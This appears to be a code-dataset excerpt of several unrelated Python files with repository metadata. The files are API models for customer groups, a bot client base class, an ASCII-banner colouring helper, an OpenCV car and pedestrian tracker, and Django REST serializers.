ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| ja | 0.999934 | 客層セクションの更新を行います。 put処理のため、saveメソッドをオーバーライド | 2.308725 | 2 |
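The repeated Field(default_factory=NoData) pattern above uses a sentinel default so that "field absent from the API response" can be told apart from an explicit null. A minimal, self-contained sketch of the same idea in pydantic v1 style (the Missing class and CustomerGroupSketch model are illustrative stand-ins, not SmaregiPy's own NoData):

# Minimal sketch of the "sentinel default" pattern used above.
# `Missing` stands in for SmaregiPy's NoData and is purely illustrative.
from typing import Optional
from pydantic import BaseModel, Field


class Missing:
    """Sentinel meaning the API response did not contain this field at all."""
    def __repr__(self):
        return "<missing>"


class CustomerGroupSketch(BaseModel):
    customer_group_id: Optional[int] = Field(default_factory=Missing)
    label: Optional[str] = Field(default_factory=Missing)


record = CustomerGroupSketch(customer_group_id=3)
print(record.customer_group_id)            # 3: supplied by the caller and validated
print(isinstance(record.label, Missing))   # True: absent from the payload, not merely null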
StickyDJ-Bot/src/clients/client.py | JCab09/StickyDJ-Bot | 0 | 9196 | #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: <NAME>
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
    def get_client_configuration(self):
        """Return the client configuration held by this client."""
        return self._clientConfig

    def load_client_configuration(self, configpath, configtype):
        """Load (or reload) the client configuration into memory."""
        self._clientConfig = configmaker.getConfig(configpath, configtype)
| #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: <NAME>
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
    def get_client_configuration(self):
        """Return the client configuration held by this client."""
        return self._clientConfig

    def load_client_configuration(self, configpath, configtype):
        """Load (or reload) the client configuration into memory."""
        self._clientConfig = configmaker.getConfig(configpath, configtype)
| en | 0.819947 | #!/usr/bin/env python3 Base-Client Class This is the parent-class of all client-classes and holds properties and functions they all depend on. Author: <NAME> Base-Client Class Base Class for getting client configuration Base Class for loading client configuration into memory | 3.109398 | 3 |
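A hypothetical sketch of how a concrete client could extend the BaseClient above (the DJClient name, import path, config path, and config type are assumptions for illustration; running it requires the StickyDJ package and a readable config file at the illustrative path):

# Hypothetical subclass sketch; the DJClient name, config path and "json"
# config type are assumptions, not taken from the StickyDJ codebase.
from src.clients.client import BaseClient   # assumed import path for the class above


class DJClient(BaseClient):
    """Example concrete client that builds on BaseClient."""

    def __init__(self, configpath="config/dj.json", configtype="json", debugFlag=False):
        super().__init__(configpath, configtype, debugFlag)
        self._prompt = "dj> "   # replace the default "-" prompt from the base class


client = DJClient(debugFlag=True)    # assumes the illustrative config file exists
print(client.prompt)                 # dj>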
cryptomon/ascii.py | S0L1DUS/cryptocoinmon | 0 | 9197 | # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| en | 0.523504 | # -*- coding: utf-8 -*- /$$$$$$ /$$ /$$ /$$ /$$__ $$ | $$ | $$$ /$$$ | $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$ | $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$ | $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$ | $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$ | $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$ \______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/ /$$ | $$| $$ | $$$$$$/| $$ \______/ |__/ | 2.460153 | 2 |
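A self-contained sketch of the column-wise colouring done by process_title above, with a stand-in Colors class so it runs without the cryptomon package (the ANSI escape codes are standard; the class and the small banner are illustrative):

# Standalone re-implementation of process_title's colouring: the first 13
# characters of each banner line are printed in blue, the remainder (one
# separator column skipped) in yellow. Colors here is an illustrative stand-in.
import io


class Colors:
    BLUE = "\033[94m"
    YELLOW = "\033[93m"
    ENDLINE = "\033[0m"


def colour_banner(title):
    # Like the original, drop the leading and trailing (blank) lines of the banner.
    lines = io.StringIO(title).readlines()[1:-1]
    coloured = ""
    for line in lines:
        coloured += Colors.BLUE + line[:13] + Colors.YELLOW + line[14:]
    return coloured + Colors.ENDLINE


banner = """
 CCCC   M   M
C       MM MM
C       M M M
 CCCC   M   M

"""
print(colour_banner(banner))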
car & pedestrian_tracker.py | Ishita-2001/Car-And-Pedestrian-prediction | 1 | 9198 | import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run until the video ends or the user presses the stop key
while True:
    (read_successful, frame) = video.read()
    if not read_successful:
        break
    gr_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run until the video ends or the user presses the stop key
while True:
    (read_successful, frame) = video.read()
    if not read_successful:
        break
    gr_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| en | 0.760304 | #pre trained pedestrian and car classifier #create car n pedestrian classifier #run forever untill car stop #detect cars n pedestrian #draw rectangle around cars #draw rectangle around pedestrian #display #stopping condition # release the VideoCapture object | 3.229544 | 3 |
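A hedged hardening sketch of the tracking script above: it verifies that the Haar cascade files actually loaded, stops cleanly at the end of the video, and releases the display window (the relative file paths are placeholders for the original absolute Windows paths):

# Sketch: defensive checks that are easy to add around the tracker above.
# The cascade/video paths are placeholders, not the original Windows paths.
import cv2

video = cv2.VideoCapture("pedestrian.mp4")
car_tracker = cv2.CascadeClassifier("car.xml")
pedestrian_tracker = cv2.CascadeClassifier("pedestrian.xml")

# CascadeClassifier silently yields an empty detector if the XML path is wrong.
if car_tracker.empty() or pedestrian_tracker.empty():
    raise FileNotFoundError("one of the Haar cascade XML files failed to load")

while True:
    read_successful, frame = video.read()
    if not read_successful:          # end of file or camera error
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    for (x, y, w, h) in car_tracker.detectMultiScale(gray):
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
    for (x, y, w, h) in pedestrian_tracker.detectMultiScale(gray):
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 255), 2)
    cv2.imshow("cars and pedestrians", frame)
    key = cv2.waitKey(1) & 0xFF
    if key in (ord("s"), ord("S")):
        break

video.release()
cv2.destroyAllWindows()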
saleor/wing/api/serializers.py | glosoftgroup/tenants | 1 | 9199 | <filename>saleor/wing/api/serializers.py<gh_stars>1-10
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
        except Exception:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| <filename>saleor/wing/api/serializers.py<gh_stars>1-10
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
        except Exception:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| en | 0.407684 | # site settings rest api serializers | 2.36331 | 2 |
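A hypothetical view-level sketch of how serializers like the ones above are commonly wired into Django REST Framework generic views (the view classes below are illustrative and not taken from the tenants project itself):

# Hypothetical wiring sketch; the view classes are illustrative only.
from rest_framework import generics
from saleor.wing.models import Wing as Table
from saleor.wing.api.serializers import TableListSerializer, CreateListSerializer


class WingListAPIView(generics.ListAPIView):
    """Read-only listing endpoint backed by TableListSerializer."""
    serializer_class = TableListSerializer
    queryset = Table.objects.all()


class WingCreateAPIView(generics.CreateAPIView):
    """Create endpoint backed by CreateListSerializer."""
    serializer_class = CreateListSerializer
    queryset = Table.objects.all()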